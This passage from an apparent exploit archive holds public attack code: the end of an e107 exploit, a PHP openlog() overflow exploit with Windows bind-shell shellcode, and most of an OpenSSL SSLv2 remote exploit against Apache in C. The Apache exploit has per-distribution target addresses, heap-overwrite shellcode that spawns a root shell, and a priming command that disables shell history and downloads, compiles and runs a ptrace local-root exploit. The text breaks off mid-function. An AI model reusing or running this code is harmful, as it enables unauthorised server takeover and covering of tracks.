print "-=[ e107 remote sploit ]=-\n";
print " by sysbug \n\n";
print "# usage: perl $0 <host> \n";
}
# [2004-12-22]
80 PHP <= 4.3.7 openlog() Buffer Overflow Exploit
<?
################################################## #####################
############################# PUBLIC EXPLOIT #########################
################################################## #####################
## PHP v4.3.x exploit by The Warlock [BhQ], http://go.to/biohazardhq ##
################### mail:[email protected] ##################
################################################## ####################
############################ PUBLIC EXPLOIT ##########################
################################################## #####################
/* This "Proof of Concept" sploit is only for Win2k SP4 + PHP 4.3.5 on Apache
2.0.49*
Sploit tested with Apache 2.0.49 + PHP 4.3.5 on a Win2K SP4.
bugtraq says local exploit.
This bug is reported a long long time ago for v4.3.1
bugs.php.net does not have any status that refers to this bug while
reported.
The bug is still alive in v4.3.5 and probably newer versions as well,
CHANGELOG of versions to 4.3.7 does not mention the bugfix of openlog();
scenario :
--->
http://www.vulnerable.box/remincl.php?page=http://3v1l.h4x0r.b0x/tooopenlog.php.txt
BOOM....
netcat www.vulnerable.box 65535
Microsoft Windows 2000 [versie 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\Program Files\Apache Group\Apache2>
--->
Getting a shell is better then parsing commands to the weblog.
[email protected] wrote on bugtraq :
>* Buffer overflow in openlog()
>
>I've tried passing long parameters (and large integers) to openlog(). No
>crashes could be caused by this "exploit". I was unable to demonstrate any
>disruption to PHP via this "vulnerability", let alone complete control.
>Unless the vendor or the original reporter will confirm this with code
>(which was, oddly enough, MISSING from the original advisory), I don't
>believe this "flaw" (if it exists) can do any damage to a default
>production system.
*/
################################################## #####################
########################### PUBLIC EXPLOIT ###########################
################################################## #####################
// win32 shellcode: bind TCP/65535, size 399, By The Warlock [BhQ].
$gift = "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x 73\x17\x02\x03";
$gift .= "\x02\x02\x83\xeb\xfc\xe2\xf4\xea\x55\x02\x02\x02\x 50\x57\x54\x55";
$gift .= "\x88\x6e\x26\x1a\x88\x47\x3e\x89\x57\x07\x7a\x03\x e9\x89\x48\x1a";
$gift .= "\x88\x58\x22\x03\xe8\xe1\x30\x4b\x88\x36\x89\x03\x ed\x33\xfd\xfe";
$gift .= "\x32\xc2\xae\x3a\xe3\x76\x05\xc3\xcc\x0f\x03\xc5\x e8\xf0\x39\x7e";
$gift .= "\x27\x16\x77\xe3\x88\x58\x26\x03\xe8\x64\x89\x0e\x 48\x89\x58\x1e";
$gift .= "\x02\xe9\x89\x06\x88\x03\xea\xe9\x01\x33\xc2\x5d\x 5d\x5f\x59\xc0";
$gift .= "\x0b\x02\x5c\x68\x33\x5b\x66\x89\x1a\x89\x59\x0e\x 88\x59\x1e\x89";
$gift .= "\x18\x89\x59\x0a\x50\x6a\x8c\x4c\x0d\xee\xfd\xd4\x 8a\xc5\x83\xee";
$gift .= "\x03\x03\x02\x02\x54\x54\x51\x8b\xe6\xea\x25\x02\x 03\x02\x92\x03";
$gift .= "\x03\x02\xb4\x1b\x1b\xe5\xa6\x1b\x73\xeb\xe7\x4b\x 85\x4b\xa6\x18";
$gift .= "\x73\xc5\xa6\xaf\x2d\xeb\xdb\x0b\xf6\xaf\xc9\xef\x ff\x39\x55\x51";
$gift .= "\x31\x5d\x31\x30\x03\x59\x8f\x49\x23\x53\xfd\xd5\x 8a\xdd\x8b\xc1";
$gift .= "\x8e\x77\x16\x68\x04\x5b\x53\x51\xfc\x36\x8d\xfd\x 56\x06\x5b\x8b";
$gift .= "\x07\x8c\xe0\xf0\x28\x25\x56\xfd\x34\xfd\x57\x32\x 32\xc2\x52\x52";
$gift .= "\x53\x52\x42\x52\x43\x52\xfd\x57\x2f\x8b\xc5\x33\x d8\x51\x51\x6a";
$gift .= "\x01\x02\xfd\xfd\x8a\xe2\x68\x12\x53\x55\xfd\x57\x 27\x51\x55\xfd";
$gift .= "\x56\x2a\x51\x56\x54\xfd\x57\x22\x8a\xc5\x6a\x41\x 4e\x46\x02\x8b";
$gift .= "\xe0\x85\xf8\x33\xc3\x8f\x7e\x26\xaf\x68\x17\x5b\x f0\xa9\x85\xf8";
$gift .= "\x80\xee\x56\xc4\x47\x26\x12\x46\x65\xc5\x46\x26\x 3f\x03\x03\x8b";
$gift .= "\x7f\x26\x4a\x8b\x7f\x26\x4e\x8b\x7f\x26\x52\x8f\x 47\x26\x12\x56";
$gift .= "\x53\x53\x53\x53\x42\x53\x4b\x53\x52\x51\x53\xfd\x 76\x02\x6a\x70";
$gift .= "\xfd\xb1\x14\xfd\x56\x06\xfd\xd2\x8a\xe4\xfd\x77\x 03\x6a\xaf\xdb";
$gift .= "\x06\xcc\xfd\x57\x07\x8b\xc1\x68\xfc\xfd\x34\xfd\x d0\xfd\x77\x02";
$gift .= "\x6b\x7c\xda\xe0\x70\xfd\x57\x06\x32\xd9\x51\xfd\x d3\x02\x02";
$ret = "\xb8\x9e\xe3\x77";
$nop =str_repeat("\x90", 1024);
$boomstring = $nop . $ret . $nop . $gift;
openlog($boomstring, LOG_PID, LOG_DAEMON);
// uncomment openlog(); to enable exploit... - str0ke did it already for ya.
?>
# [2004-12-28]
80 Apache OpenSSL Remote Exploit (Multiple Targets) (Open****V2.c)
/*
* OF version r00t VERY PRIV8 spabam
* Compile with: gcc -o Open**** Open****.c -lcrypto
* objdump -R /usr/sbin/httpd|grep free to get more targets
* #hackarena irc.brasnet.org
*/
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <errno.h>
#include <string.h>
#include <stdio.h>
#include <unistd.h>
#include <openssl/ssl.h>
#include <openssl/rsa.h>
#include <openssl/x509.h>
#include <openssl/evp.h>
/* update this if you add architectures */
#define MAX_ARCH 138
struct archs {
char* desc;
int func_addr; /* objdump -R /usr/sbin/httpd | grep free */
} architectures[] = {
{
"Caldera OpenLinux (apache-1.3.26)",
0x080920e0
},
{
"Cobalt Sun 6.0 (apache-1.3.12)",
0x8120f0c
},
{
"Cobalt Sun 6.0 (apache-1.3.20)",
0x811dcb8
},
{
"Cobalt Sun x (apache-1.3.26)",
0x8123ac3
},
{
"Cobalt Sun x Fixed2 (apache-1.3.26)",
0x81233c3
},
{
"Conectiva 4 (apache-1.3.6)",
0x08075398
},
{
"Conectiva 4.1 (apache-1.3.9)",
0x0808f2fe
},
{
"Conectiva 6 (apache-1.3.14)",
0x0809222c
},
{
"Conectiva 7 (apache-1.3.12)",
0x0808f874
},
{
"Conectiva 7 (apache-1.3.19)",
0x08088aa0
},
{
"Conectiva 7/8 (apache-1.3.26)",
0x0808e628
},
{
"Conectiva 8 (apache-1.3.22)",
0x0808b2d0
},
{
"Debian GNU Linux 2.2 Potato (apache_1.3.9-14.1)",
0x08095264
},
{
"Debian GNU Linux (apache_1.3.19-1)",
0x080966fc
},
{
"Debian GNU Linux (apache_1.3.22-2)",
0x08096aac
},
{
"Debian GNU Linux (apache-1.3.22-2.1)",
0x08083828
},
{
"Debian GNU Linux (apache-1.3.22-5)",
0x08083728
},
{
"Debian GNU Linux (apache_1.3.23-1)",
0x08085de8
},
{
"Debian GNU Linux (apache_1.3.24-2.1)",
0x08087d08
},
{ "Debian Linux GNU Linux 2 (apache_1.3.24-2.1)",
0x080873ac
},
{
"Debian GNU Linux (apache_1.3.24-3)",
0x08087d68
},
{
"Debian GNU Linux (apache-1.3.26-1)",
0x0080863c4
},
{
"Debian GNU Linux 3.0 Woody (apache-1.3.26-1)",
0x080863cc
},
{ "Debian GNU Linux (apache-1.3.27)",
0x0080866a3
},
{ "FreeBSD (apache-1.3.9)", 0xbfbfde00 },
{ "FreeBSD (apache-1.3.11)", 0x080a2ea8 },
{ "FreeBSD (apache-1.3.12.1.40)", 0x080a7f58 },
{ "FreeBSD (apache-1.3.12.1.40)", 0x080a0ec0 },
{ "FreeBSD (apache-1.3.12.1.40)", 0x080a7e7c },
{ "FreeBSD (apache-1.3.12.1.40_1)", 0x080a7f18 },
{ "FreeBSD (apache-1.3.12)", 0x0809bd7c },
{ "FreeBSD (apache-1.3.14)", 0xbfbfdc00 },
{ "FreeBSD (apache-1.3.14)", 0x080ab68c },
{ "FreeBSD (apache-1.3.14)", 0x0808c76c },
{ "FreeBSD (apache-1.3.14)", 0x080a3fc8 },
{ "FreeBSD (apache-1.3.14)", 0x080ab6d8 },
{ "FreeBSD (apache-1.3.17_1)", 0x0808820c },
{ "FreeBSD (apache-1.3.19)", 0xbfbfdc00 },
{ "FreeBSD (apache-1.3.19_1)", 0x0808c96c },
{ "FreeBSD (apache-1.3.20)", 0x0808cb70 },
{ "FreeBSD (apache-1.3.20)", 0xbfbfc000 },
{ "FreeBSD (apache-1.3.20+2.8.4)", 0x0808faf8 },
{ "FreeBSD (apache-1.3.20_1)", 0x0808dfb4 },
{ "FreeBSD (apache-1.3.22)", 0xbfbfc000 },
{ "FreeBSD (apache-1.3.22_7)", 0x0808d110 },
{ "FreeBSD (apache_fp-1.3.23)", 0x0807c5f8 },
{ "FreeBSD (apache-1.3.24_7)", 0x0808f8b0 },
{ "FreeBSD (apache-1.3.24+2.8.8)", 0x080927f8 },
{ "FreeBSD 4.6.2-Release-p6 (apache-1.3.26)", 0x080c432c },
{ "FreeBSD 4.6-Realease (apache-1.3.26)", 0x0808fdec },
{ "FreeBSD (apache-1.3.27)", 0x080902e4 },
{
"Gentoo Linux (apache-1.3.24-r2)",
0x08086c34
},
{
"Linux Generic (apache-1.3.14)",
0xbffff500
},
{
"Mandrake Linux X.x (apache-1.3.22-10.1mdk)",
0x080808ab
},
{
"Mandrake Linux 7.1 (apache-1.3.14-2)",
0x0809f6c4
},
{
"Mandrake Linux 7.1 (apache-1.3.22-1.4mdk)",
0x0809d233
},
{
"Mandrake Linux 7.2 (apache-1.3.14-2mdk)",
0x0809f6ef
},
{
"Mandrake Linux 7.2 (apache-1.3.14) 2",
0x0809d6c4
},
{
"Mandrake Linux 7.2 (apache-1.3.20-5.1mdk)",
0x0809ccde
},
{
"Mandrake Linux 7.2 (apache-1.3.20-5.2mdk)",
0x0809ce14
},
{
"Mandrake Linux 7.2 (apache-1.3.22-1.3mdk)",
0x0809d262
},
{
"Mandrake Linux 7.2 (apache-1.3.22-10.2mdk)",
0x08083545
},
{
"Mandrake Linux 8.0 (apache-1.3.19-3)",
0x0809ea98
},
{
"Mandrake Linux 8.1 (apache-1.3.20-3)",
0x0809e97c
},
{
"Mandrake Linux 8.2 (apache-1.3.23-4)",
0x08086580
},
{ "Mandrake Linux 8.2 #2 (apache-1.3.23-4)",
0x08086484
},
{ "Mandrake Linux 8.2 (apache-1.3.24)",
0x08086665
},
{ "Mandrake Linux 9 (apache-1.3.26)",
0x0808b864
},
{
"RedHat Linux ?.? GENERIC (apache-1.3.12-1)",
0x0808c0f4
},
{
"RedHat Linux TEST1 (apache-1.3.12-1)",
0x0808c0f4
},
{
"RedHat Linux TEST2 (apache-1.3.12-1)",
0x0808c0f4
},
{
"RedHat Linux GENERIC (marumbi) (apache-1.2.6-5)",
0x080d2c35
},
{
"RedHat Linux 4.2 (apache-1.1.3-3)",
0x08065bae
},
{
"RedHat Linux 5.0 (apache-1.2.4-4)",
0x0808c82c
},
{
"RedHat Linux 5.1-Update (apache-1.2.6)",
0x08092a45
},
{
"RedHat Linux 5.1 (apache-1.2.6-4)",
0x08092c2d
},
{
"RedHat Linux 5.2 (apache-1.3.3-1)",
0x0806f049
},
{
"RedHat Linux 5.2-Update (apache-1.3.14-2.5.x)",
0x0808e4d8
},
{
"RedHat Linux 6.0 (apache-1.3.6-7)",
0x080707ec
},
{
"RedHat Linux 6.0 (apache-1.3.6-7)",
0x080707f9
},
{
"RedHat Linux 6.0-Update (apache-1.3.14-2.6.2)",
0x0808fd52
},
{
"RedHat Linux 6.0 Update (apache-1.3.24)",
0x80acd58
},
{
"RedHat Linux 6.1 (apache-1.3.9-4)1",
0x0808ccc4
},
{
"RedHat Linux 6.1 (apache-1.3.9-4)2",
0x0808ccdc
},
{
"RedHat Linux 6.1-Update (apache-1.3.14-2.6.2)",
0x0808fd5d
},
{
"RedHat Linux 6.1-fp2000 (apache-1.3.26)",
0x082e6fcd
},
{
"RedHat Linux 6.2 (apache-1.3.12-2)1",
0x0808f689
},
{
"RedHat Linux 6.2 (apache-1.3.12-2)2",
0x0808f614
},
{
"RedHat Linux 6.2 mod(apache-1.3.12-2)3",
0xbffff94c
},
{
"RedHat Linux 6.2 update (apache-1.3.22-5.6)1",
0x0808f9ec
},
{
"RedHat Linux 6.2-Update (apache-1.3.22-5.6)2",
0x0808f9d4
},
{
"Redhat Linux 7.x (apache-1.3.22)",
0x0808400c
},
{
"RedHat Linux 7.x (apache-1.3.26-1)",
0x080873bc
},
{ "RedHat Linux 7.x (apache-1.3.27)",
0x08087221
},
{
"RedHat Linux 7.0 (apache-1.3.12-25)1",
0x0809251c
},
{
"RedHat Linux 7.0 (apache-1.3.12-25)2",
0x0809252d
},
{
"RedHat Linux 7.0 (apache-1.3.14-2)",
0x08092b98
},
{
"RedHat Linux 7.0-Update (apache-1.3.22-5.7.1)",
0x08084358
},
{
"RedHat Linux 7.0-7.1 update (apache-1.3.22-5.7.1)",
0x0808438c
},
{
"RedHat Linux 7.0-Update (apache-1.3.27-1.7.1)",
0x08086e41
},
{
"RedHat Linux 7.1 (apache-1.3.19-5)1",
0x0809af8c
},
{
"RedHat Linux 7.1 (apache-1.3.19-5)2",
0x0809afd9
},
{
"RedHat Linux 7.1-7.0 update (apache-1.3.22-5.7.1)",
0x0808438c
},
{
"RedHat Linux 7.1-Update (1.3.22-5.7.1)",
0x08084389
},
{
"RedHat Linux 7.1 (apache-1.3.22-src)",
0x0816021c
},
{
"RedHat Linux 7.1-Update (1.3.27-1.7.1)",
0x08086ec89
},
{
"RedHat Linux 7.2 (apache-1.3.20-16)1",
0x080994e5
},
{
"RedHat Linux 7.2 (apache-1.3.20-16)2",
0x080994d4
},
{
"RedHat Linux 7.2-Update (apache-1.3.22-6)",
0x08084045
},
{
"RedHat Linux 7.2 (apache-1.3.24)",
0x80b0938
},
{
"RedHat Linux 7.2 (apache-1.3.26)",
0x08161c16
},
{
"RedHat Linux 7.2 (apache-1.3.26-snc)",
0x8161c14
},
{
"Redhat Linux 7.2 (apache-1.3.26 w/PHP)1",
0x08269950
},
{
"Redhat Linux 7.2 (apache-1.3.26 w/PHP)2",
0x08269988
},
{
"RedHat Linux 7.2-Update (apache-1.3.27-1.7.2)",
0x08086af9
},
{
"RedHat Linux 7.3 (apache-1.3.23-11)1",
0x0808528c
},
{
"RedHat Linux 7.3 (apache-1.3.23-11)2",
0x0808525f
},
{
"RedHat Linux 7.3 (apache-1.3.27)",
0x080862e4
},
{ "RedHat Linux 8.0 (apache-1.3.27)",
0x08084c1c
},
{ "RedHat Linux 8.0-second (apache-1.3.27)",
0x0808151e
},
{ "RedHat Linux 8.0 (apache-2.0.40)",
0x08092fa4
},
{
"Slackware Linux 4.0 (apache-1.3.6)",
0x08088130
},
{
"Slackware Linux 7.0 (apache-1.3.9)",
0x080a7fc0
},
{
"Slackware Linux 7.0 (apache-1.3.26)",
0x083d37fc
},
{ "Slackware 7.0 (apache-1.3.26)2",
0x083d2232
},
{
"Slackware Linux 7.1 (apache-1.3.12)",
0x080a86a4
},
{
"Slackware Linux 8.0 (apache-1.3.20)",
0x080ae67c
},
{
"Slackware Linux 8.1 (apache-1.3.24)",
0x080b0c60
},
{
"Slackware Linux 8.1 (apache-1.3.26)",
0x080b2100
},
{
"Slackware Linux 8.1-stable (apache-1.3.26)",
0x080b0c60
},
{ "Slackware Linux (apache-1.3.27)",
0x080b1a3a
},
{
"SuSE Linux 7.0 (apache-1.3.12)",
0x0809f54c
},
{
"SuSE Linux 7.1 (apache-1.3.17)",
0x08099984
},
{
"SuSE Linux 7.2 (apache-1.3.19)",
0x08099ec8
},
{
"SuSE Linux 7.3 (apache-1.3.20)",
0x08099da8
},
{
"SuSE Linux 8.0 (apache-1.3.23)",
0x08086168
},
{
"SUSE Linux 8.0 (apache-1.3.23-120)",
0x080861c8
},
{
"SuSE Linux 8.0 (apache-1.3.23-137)",
0x080861c8
},
/* this one unchecked cause require differend shellcode */
{
"Yellow Dog Linux/PPC 2.3 (apache-1.3.22-6.2.3a)",
0xfd42630
},
};
extern int errno;
int cipher;
int ciphers;
/* the offset of the local port from be beginning of the overwrite next chunk buffer */
#define FINDSCKPORTOFS 208 + 12 + 46
unsigned char overwrite_session_id_length[] =
"AAAA" /* int master key length; */
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" /* unsigned char master key[SSL MAX MASTER KEY LENGTH]; */
"\x70\x00\x00\x00"; /* unsigned int session id length; */
unsigned char overwrite_next_chunk[] =
"AAAA" /* int master key length; */
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" /* unsigned char master key[SSL MAX MASTER KEY LENGTH]; */
"AAAA" /* unsigned int session id length; */
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" /* unsigned char session id[SSL MAX SSL SESSION ID LENGTH]; */
"AAAA" /* unsigned int sid ctx length; */
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" /* unsigned char sid ctx[SSL MAX SID CTX LENGTH]; */
"AAAA" /* int not resumable; */
"\x00\x00\x00\x00" /* struct sess cert st *sess cert; */
"\x00\x00\x00\x00" /* X509 *peer; */
"AAAA" /* long verify result; */
"\x01\x00\x00\x00" /* int references; */
"AAAA" /* int timeout; */
"AAAA" /* int time */
"AAAA" /* int compress meth; */
"\x00\x00\x00\x00" /* SSL CIPHER *cipher; */
"AAAA" /* unsigned long cipher id; */
"\x00\x00\x00\x00" /* STACK OF(SSL CIPHER) *ciphers; */
"\x00\x00\x00\x00\x00\x00\x00\x00" /* CRYPTO EX DATA ex data; */
"AAAAAAAA" /* struct ssl session st *prev,*next; */
"\x00\x00\x00\x00" /* Size of previous chunk */
"\x11\x00\x00\x00" /* Size of chunk, in bytes */
"fdfd" /* Forward and back pointers */
"bkbk"
"\x10\x00\x00\x00" /* Size of previous chunk */
"\x10\x00\x00\x00" /* Size of chunk, PREV INUSE is set */
/* shellcode start */
"\xeb\x0a\x90\x90" /* jump 10 bytes ahead, land at shellcode */
"\x90\x90\x90\x90"
"\x90\x90\x90\x90" /* this is overwritten with FD by the unlink macro */
/* 72 bytes findsckcode by LSD-pl */
"\x31\xdb" /* xorl %ebx,%ebx */
"\x89\xe7" /* movl %esp,%edi */
"\x8d\x77\x10" /* leal 0x10(%edi),%esi */
"\x89\x77\x04" /* movl %esi,0x4(%edi) */
"\x8d\x4f\x20" /* leal 0x20(%edi),%ecx */
"\x89\x4f\x08" /* movl %ecx,0x8(%edi) */
"\xb3\x10" /* movb $0x10,%bl */
"\x89\x19" /* movl %ebx,(%ecx) */
"\x31\xc9" /* xorl %ecx,%ecx */
"\xb1\xff" /* movb $0xff,%cl */
"\x89\x0f" /* movl %ecx,(%edi) */
"\x51" /* pushl %ecx */
"\x31\xc0" /* xorl %eax,%eax */
"\xb0\x66" /* movb $0x66,%al */
"\xb3\x07" /* movb $0x07,%bl */
"\x89\xf9" /* movl %edi,%ecx */
"\xcd\x80" /* int $0x80 */
"\x59" /* popl %ecx */
"\x31\xdb" /* xorl %ebx,%ebx */
"\x39\xd8" /* cmpl %ebx,%eax */
"\x75\x0a" /* jne <findsckcode+54> */
"\x66\xb8\x12\x34" /* movw $0x1234,%bx */
"\x66\x39\x46\x02" /* cmpw %bx,0x2(%esi) */
"\x74\x02" /* je <findsckcode+56> */
"\xe2\xe0" /* loop <findsckcode+24> */
"\x89\xcb" /* movl %ecx,%ebx */
"\x31\xc9" /* xorl %ecx,%ecx */
"\xb1\x03" /* movb $0x03,%cl */
"\x31\xc0" /* xorl %eax,%eax */
"\xb0\x3f" /* movb $0x3f,%al */
"\x49" /* decl %ecx */
"\xcd\x80" /* int $0x80 */
"\x41" /* incl %ecx */
"\xe2\xf6" /* loop <findsckcode+62> */
/* 10 byte setresuid(0,0,0); by core */
"\x31\xc9" /* xor %ecx,%ecx */
"\xf7\xe1" /* mul %ecx,%eax */
"\x51" /* push %ecx */
"\x5b" /* pop %ebx */
"\xb0\xa4" /* mov $0xa4,%al */
"\xcd\x80" /* int $0x80 */
/* bigger shellcode added by spabam */
/* "\xB8\x2F\x73\x68\x23\x25\x2F\x73\x68\xDC\x50\x68\x 2F\x62\x69"
"\x6E\x89\xE3\x31\xC0\x50\x53\x89\xE1\x04\x0B\x31\x D2\xCD\x80"
*/
/* 24 bytes execl("/bin/sh", "/bin/sh", 0); by LSD-pl */
"\x31\xc0" /* xorl %eax,%eax */
"\x50" /* pushl %eax */
"\x68""//sh" /* pushl $0x68732f2f */
"\x68""/bin" /* pushl $0x6e69622f */
"\x89\xe3" /* movl %esp,%ebx */
"\x50" /* pushl %eax */
"\x53" /* pushl %ebx */
"\x89\xe1" /* movl %esp,%ecx */
"\x99" /* cdql */
"\xb0\x0b" /* movb $0x0b,%al */
"\xcd\x80"; /* int $0x80 */
/* read and write buffer*/
#define BUFSIZE 16384
/* hardcoded protocol stuff */
#define CHALLENGE_LENGTH 16
#define RC4_KEY_LENGTH 16 /* 128 bits */
#define RC4_KEY_MATERIAL_LENGTH (RC4_KEY_LENGTH*2)
/* straight from the openssl source */
#define n2s(c,s) ((s=(((unsigned int)(c[0]))<< 8)| (((unsigned int)(c[1])) )),c+=2)
#define s2n(s,c) ((c[0]=(unsigned char)(((s)>> 8)&0xff), c[1]=(unsigned char)(((s) )&0xff)),c+=2)
/* we keep all SSL2 state in this structure */
typedef struct {
int sock;
/* client stuff */
unsigned char challenge[CHALLENGE_LENGTH];
unsigned char master_key[RC4_KEY_LENGTH];
unsigned char key_material[RC4_KEY_MATERIAL_LENGTH];
/* connection id - returned by the server */
int conn_id_length;
unsigned char conn_id[SSL2_MAX_CONNECTION_ID_LENGTH];
/* server certificate */
X509 *x509;
/* session keys */
unsigned char* read_key;
unsigned char* write_key;
RC4_KEY* rc4_read_key;
RC4_KEY* rc4_write_key;
/* sequence numbers, used for MAC calculation */
int read_seq;
int write_seq;
/* set to 1 when the SSL2 handshake is complete */
int encrypted;
} ssl_conn;
#define COMMAND1 "TERM=xterm; export TERM=xterm; exec bash -i\n"
#define COMMAND2 "unset HISTFILE; cd /tmp; wget http://packetstormsecurity.nl/0304-exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; \n"
long getip(char *hostname) {
struct hostent *he;
long ipaddr;
if ((ipaddr = inet_addr(hostname)) < 0) {
if ((he = gethostbyname(hostname)) == NULL) {
perror("gethostbyname()");
exit(-1);
}
memcpy(&ipaddr, he->h_addr, he->h_length);
}
return ipaddr;
}
/* mixter's code w/enhancements by core */
int sh(int sockfd) {
char snd[1024], rcv[1024];
fd_set rset;
int maxfd, n;
/* Priming commands */
strcpy(snd, COMMAND1 "\n");
write(sockfd, snd, strlen(snd));
strcpy(snd, COMMAND2 "\n");
write(sockfd, snd, strlen(snd));
/* Main command loop */
for (;;) {
FD_SET(fileno(stdin), &rset);
FD_SET(sockfd, &rset);
maxfd = ( ( fileno(stdin) > sockfd )?fileno(stdin):sockfd ) + 1;
select(maxfd, &rset, NULL, NULL, NULL);
if (FD_ISSET(fileno(stdin), &rset)) {
bzero(snd, sizeof(snd));
fgets(snd, sizeof(snd)-2, stdin);
write(sockfd, snd, strlen(snd));
}
if (FD_ISSET(sockfd, &rset)) {
bzero(rcv, sizeof(rcv));
if ((n = read(sockfd, rcv, sizeof(rcv))) == 0) {
printf("Good Bye!\n");
return 0;
}
if (n < 0) {
perror("read");
return 1;
}
fputs(rcv, stdout);
fflush(stdout); /* keeps output nice */
}
} /* for(;;) */
}
/* Returns the local port of a connected socket */
int get_local_port(int sock)
{
struct sockaddr_in s_in;
unsigned int namelen = sizeof(s_in);
if (getsockname(sock, (struct sockaddr *)&s_in, &namelen) < 0) {
printf("Can't get local port: %s\n", strerror(errno));
exit(1);
}
return s_in.sin_port;
}
/* Connect to a host */
int connect_host(char* host, int port)
{
struct sockaddr_in s_in;
int sock;
s_in.sin_family = AF_INET;
s_in.sin_addr.s_addr = getip(host);
s_in.sin_port = htons(port);
if ((sock = socket(AF_INET, SOCK_STREAM, 0)) <= 0) {
printf("Could not create a socket\n");
exit(1);
}
if (connect(sock, (struct sockaddr *)&s_in, sizeof(s_in)) < 0) {
printf("Connection to %s:%d failed: %s\n", host, port, strerror(errno));
exit(1);
}
return sock;
}
/* Create a new ssl conn structure and connect to a host */
ssl_conn* ssl_connect_host(char* host, int port)
{
ssl_conn* ssl;
if (!(ssl = (ssl_conn*) malloc(sizeof(ssl_conn)))) {
printf("Can't allocate memory\n");
exit(1);
}
/* Initialize some values */
ssl->encrypted = 0;
ssl->write_seq = 0;
ssl->read_seq = 0;
ssl->sock = connect_host(host, port);
return ssl;
}
/* global buffer used by the ssl result() */
char res_buf[30];
/* converts an SSL error code to a string */
char* ssl_error(int code) {
switch (code) {
case 0x00: return "SSL2 PE UNDEFINED ERROR (0x00)";
case 0x01: return "SSL2 PE NO CIPHER (0x01)";
case 0x02: return "SSL2 PE NO CERTIFICATE (0x02)";
case 0x04: return "SSL2 PE BAD CERTIFICATE (0x03)";
case 0x06: return "SSL2 PE UNSUPPORTED CERTIFICATE TYPE (0x06)";
default:
sprintf(res_buf, "%02x", code);
return res_buf;
}
}
/* read len bytes from a socket. boring. */
int read_data(int sock, unsigned char* buf, int len)
{
int l;
int to_read = len;
do {
if ((l = read(sock, buf, to_read)) < 0) {
printf("Error in read: %s\n", strerror(errno));
exit(1);
}
to_read -= len;
} while (to_read > 0);
return len;
}
/* reads an SSL packet and decrypts it if necessery */
int read_ssl_packet(ssl_conn* ssl, unsigned char* buf, int buf_size)
{
int rec_len, padding;
read_data(ssl->sock, buf, 2);
if ((buf[0] & 0x80) == 0) {
/* three byte header */
rec_len = ((buf[0] & 0x3f) << 8) | buf[1];
read_data(ssl->sock, &buf[2], 1);
padding = (int)buf[2];
}
else {
/* two byte header */
rec_len = ((buf[0] & 0x7f) << 8) | buf[1];
padding = 0;
}
if ((rec_len <= 0) || (rec_len > buf_size)) {
printf("read_ssl_packet: Record length out of range (rec_len = %d)\n", rec_len);
exit(1);
}
read_data(ssl->sock, buf, rec_len);
if (ssl->encrypted) {
if (MD5_DIGEST_LENGTH + padding >= rec_len) {
if ((buf[0] == SSL2_MT_ERROR) && (rec_len == 3)) {
/* the server didn't switch to encryption due to an error */
return 0;
}
else {
printf("read_ssl_packet: Encrypted message is too short (rec_len = %d)\n", rec_len);
exit(1);
}
}
/* decrypt the encrypted part of the packet */
RC4(ssl->rc4_read_key, rec_len, buf, buf);
/* move the decrypted message in the beginning of the buffer */
rec_len = rec_len - MD5_DIGEST_LENGTH - padding;
memmove(buf, buf + MD5_DIGEST_LENGTH, rec_len);
}
if (buf[0] == SSL2_MT_ERROR) {
if (rec_len != 3) {
printf("Malformed server error message\n");
exit(1);
}
else {
return 0;
}
}
return rec_len;
}
/* send an ssl packet, encrypting it if ssl->encrypted is set */
void send_ssl_packet(ssl_conn* ssl, unsigned char* rec, int rec_len)
{
unsigned char buf[BUFSIZE];
unsigned char* p;
int tot_len;
MD5_CTX ctx;
int seq;
if (ssl->encrypted)
tot_len = rec_len + MD5_DIGEST_LENGTH; /* RC4 needs no padding */
else
tot_len = rec_len;
if (2 + tot_len > BUFSIZE) {
printf("send_ssl_packet: Record length out of range (rec_len = %d)\n", rec_len);
exit(1);
}
p = buf;
s2n(tot_len, p);
buf[0] = buf[0] | 0x80; /* two byte header */
if (ssl->encrypted) {
/* calculate the MAC */
seq = ntohl(ssl->write_seq);
MD5_Init(&ctx);
MD5_Update(&ctx, ssl->write_key, RC4_KEY_LENGTH);
MD5_Update(&ctx, rec, rec_len);
MD5_Update(&ctx, &seq, 4);
MD5_Final(p, &ctx);
p+=MD5_DIGEST_LENGTH;
memcpy(p, rec, rec_len);
/* encrypt the payload */
RC4(ssl->rc4_write_key, tot_len, &buf[2], &buf[2]);
}
else {
memcpy(p, rec, rec_len);
}
send(ssl->sock, buf, 2 + tot_len, 0);
/* the sequence number is incremented by both encrypted and plaintext packets
*/
ssl->write_seq++;
}
/* Send a CLIENT HELLO message to the server */
void send_client_hello(ssl_conn *ssl)
{
int i;
unsigned char buf[BUFSIZE] =
"\x01" /* client hello msg */
"\x00\x02" /* client version */
"\x00\x18" /* cipher specs length */
"\x00\x00" /* session id length */
"\x00\x10" /* challenge length */
"\x07\x00\xc0\x05\x00\x80\x03\x00" /* cipher specs data */
"\x80\x01\x00\x80\x08\x00\x80\x06"
"\x00\x40\x04\x00\x80\x02\x00\x80"
""; /* session id data */
/* generate CHALLENGE LENGTH bytes of challenge data */
for (i = 0; i < CHALLENGE_LENGTH; i++) {
ssl->challenge[i] = (unsigned char) (rand() >> 24);
}
memcpy(&buf[33], ssl->challenge, CHALLENGE_LENGTH);
send_ssl_packet(ssl, buf, 33 + CHALLENGE_LENGTH);
}
/* Get a SERVER HELLO response from the server */
void get_server_hello(ssl_conn* ssl)
{
unsigned char buf[BUFSIZE];
unsigned char *p, *end;
int len;
int server_version, cert_length, cs_length, conn_id_length;
int found;
if (!(len = read_ssl_packet(ssl, buf, sizeof(buf)))) {
printf("Server error: %s\n", ssl_error(ntohs(*(uint16_t*)&buf[1])));
exit(1);
}
if (len < 11) {
printf("get_server_hello: Packet too short (len = %d)\n", len);
exit(1);
}
p = buf;
if (*(p++) != SSL2_MT_SERVER_HELLO) {
printf("get_server_hello: Expected SSL2 MT SERVER HELLO, got %x\n", (int)p[-1]);
exit(1);
}
if (*(p++) != 0) {
